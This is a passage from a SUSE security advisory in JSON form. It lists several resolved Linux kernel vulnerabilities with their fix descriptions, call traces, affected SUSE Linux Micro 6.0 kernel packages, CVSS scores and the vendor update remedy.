include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71123",
"url": "https://www.suse.com/security/cve/CVE-2025-71123"
},
{
"category": "external",
"summary": "SUSE Bug 1256757 for CVE-2025-71123",
"url": "https://bugzilla.suse.com/1256757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71123"
},
{
"cve": "CVE-2025-71130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71130"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer\n\nInitialize the eb.vma array with values of 0 when the eb structure is\nfirst set up. In particular, this sets the eb-\u003evma[i].vma pointers to\nNULL, simplifying cleanup and getting rid of the bug described below.\n\nDuring the execution of eb_lookup_vmas(), the eb-\u003evma array is\nsuccessively filled up with struct eb_vma objects. This process includes\ncalling eb_add_vma(), which might fail; however, even in the event of\nfailure, eb-\u003evma[i].vma is set for the currently processed buffer.\n\nIf eb_add_vma() fails, eb_lookup_vmas() returns with an error, which\nprompts a call to eb_release_vmas() to clean up the mess. Since\neb_lookup_vmas() might fail during processing any (possibly not first)\nbuffer, eb_release_vmas() checks whether a buffer\u0027s vma is NULL to know\nat what point did the lookup function fail.\n\nIn eb_lookup_vmas(), eb-\u003evma[i].vma is set to NULL if either the helper\nfunction eb_lookup_vma() or eb_validate_vma() fails. eb-\u003evma[i+1].vma is\nset to NULL in case i915_gem_object_userptr_submit_init() fails; the\ncurrent one needs to be cleaned up by eb_release_vmas() at this point,\nso the next one is set. If eb_add_vma() fails, neither the current nor\nthe next vma is set to NULL, which is a source of a NULL deref bug\ndescribed in the issue linked in the Closes tag.\n\nWhen entering eb_lookup_vmas(), the vma pointers are set to the slab\npoison value, instead of NULL. This doesn\u0027t matter for the actual\nlookup, since it gets overwritten anyway, however the eb_release_vmas()\nfunction only recognizes NULL as the stopping value, hence the pointers\nare being set to NULL as they go in case of intermediate failure. This\npatch changes the approach to filling them all with NULL at the start\ninstead, rather than handling that manually during failure.\n\n(cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71130",
"url": "https://www.suse.com/security/cve/CVE-2025-71130"
},
{
"category": "external",
"summary": "SUSE Bug 1256741 for CVE-2025-71130",
"url": "https://bugzilla.suse.com/1256741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71130"
},
{
"cve": "CVE-2025-71131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71131"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt\n\nAs soon as crypto_aead_encrypt is called, the underlying request\nmay be freed by an asynchronous completion. Thus dereferencing\nreq-\u003eiv after it returns is invalid.\n\nInstead of checking req-\u003eiv against info, create a new variable\nunaligned_info and use it for that purpose instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71131",
"url": "https://www.suse.com/security/cve/CVE-2025-71131"
},
{
"category": "external",
"summary": "SUSE Bug 1256742 for CVE-2025-71131",
"url": "https://bugzilla.suse.com/1256742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71131"
},
{
"cve": "CVE-2025-71132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc91x: fix broken irq-context in PREEMPT_RT\n\nWhen smc91x.c is built with PREEMPT_RT, the following splat occurs\nin FVP_RevC:\n\n[ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000\n[ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106]\n[ 13.062137] preempt=0x00000000 lock=0-\u003e0 RCU=0-\u003e1 workfn=mld_ifc_work\n[ 13.062266] C\n** replaying previous printk message **\n[ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)}\n[ 13.062353] Hardware name: , BIOS\n[ 13.062382] Workqueue: mld mld_ifc_work\n[ 13.062469] Call trace:\n[ 13.062494] show_stack+0x24/0x40 (C)\n[ 13.062602] __dump_stack+0x28/0x48\n[ 13.062710] dump_stack_lvl+0x7c/0xb0\n[ 13.062818] dump_stack+0x18/0x34\n[ 13.062926] process_scheduled_works+0x294/0x450\n[ 13.063043] worker_thread+0x260/0x3d8\n[ 13.063124] kthread+0x1c4/0x228\n[ 13.063235] ret_from_fork+0x10/0x20\n\nThis happens because smc_special_trylock() disables IRQs even on PREEMPT_RT,\nbut smc_special_unlock() does not restore IRQs on PREEMPT_RT.\nThe reason is that smc_special_unlock() calls spin_unlock_irqrestore(),\nand rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke\nrcu_read_unlock() through __local_bh_enable_ip() when current-\u003esoftirq_disable_cnt becomes zero.\n\nTo address this issue, replace smc_special_trylock() with spin_trylock_irqsave().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71132",
"url": "https://www.suse.com/security/cve/CVE-2025-71132"
},
{
"category": "external",
"summary": "SUSE Bug 1256737 for CVE-2025-71132",
"url": "https://bugzilla.suse.com/1256737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71132"
},
{
"cve": "CVE-2025-71133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: avoid invalid read in irdma_net_event\n\nirdma_net_event() should not dereference anything from \"neigh\" (alias\n\"ptr\") until it has checked that the event is NETEVENT_NEIGH_UPDATE.\nOther events come with different structures pointed to by \"ptr\" and they\nmay be smaller than struct neighbour.\n\nMove the read of neigh-\u003edev under the NETEVENT_NEIGH_UPDATE case.\n\nThe bug is mostly harmless, but it triggers KASAN on debug kernels:\n\n BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma]\n Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554\n\n CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1\n Hardware name: [...]\n Workqueue: events rt6_probe_deferred\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x60/0xb0\n print_address_description.constprop.0+0x2c/0x3f0\n print_report+0xb4/0x270\n kasan_report+0x92/0xc0\n irdma_net_event+0x32e/0x3b0 [irdma]\n notifier_call_chain+0x9e/0x180\n atomic_notifier_call_chain+0x5c/0x110\n rt6_do_redirect+0xb91/0x1080\n tcp_v6_err+0xe9b/0x13e0\n icmpv6_notify+0x2b2/0x630\n ndisc_redirect_rcv+0x328/0x530\n icmpv6_rcv+0xc16/0x1360\n ip6_protocol_deliver_rcu+0xb84/0x12e0\n ip6_input_finish+0x117/0x240\n ip6_input+0xc4/0x370\n ipv6_rcv+0x420/0x7d0\n __netif_receive_skb_one_core+0x118/0x1b0\n process_backlog+0xd1/0x5d0\n __napi_poll.constprop.0+0xa3/0x440\n net_rx_action+0x78a/0xba0\n handle_softirqs+0x2d4/0x9c0\n do_softirq+0xad/0xe0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71133",
"url": "https://www.suse.com/security/cve/CVE-2025-71133"
},
{
"category": "external",
"summary": "SUSE Bug 1256733 for CVE-2025-71133",
"url": "https://bugzilla.suse.com/1256733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71133"
},
{
"cve": "CVE-2025-71135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt()\n\nThe variable mddev-\u003eprivate is first assigned to conf and then checked:\n\n conf = mddev-\u003eprivate;\n if (!conf) ...\n\nIf conf is NULL, then mddev-\u003eprivate is also NULL. In this case,\nnull-pointer dereferences can occur when calling raid5_quiesce():\n\n raid5_quiesce(mddev, true);\n raid5_quiesce(mddev, false);\n\nsince mddev-\u003eprivate is assigned to conf again in raid5_quiesce(), and conf\nis dereferenced in several places, for example:\n\n conf-\u003equiesce = 0;\n wake_up(\u0026conf-\u003ewait_for_quiescent);\n\nTo fix this issue, the function should unlock mddev and return before\ninvoking raid5_quiesce() when conf is NULL, following the existing pattern\nin raid5_change_consistency_policy().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71135",
"url": "https://www.suse.com/security/cve/CVE-2025-71135"
},
{
"category": "external",
"summary": "SUSE Bug 1256761 for CVE-2025-71135",
"url": "https://bugzilla.suse.com/1256761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71135"
},
{
"cve": "CVE-2025-71136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71136"
}
],
"notes": [
{
"category": "general",
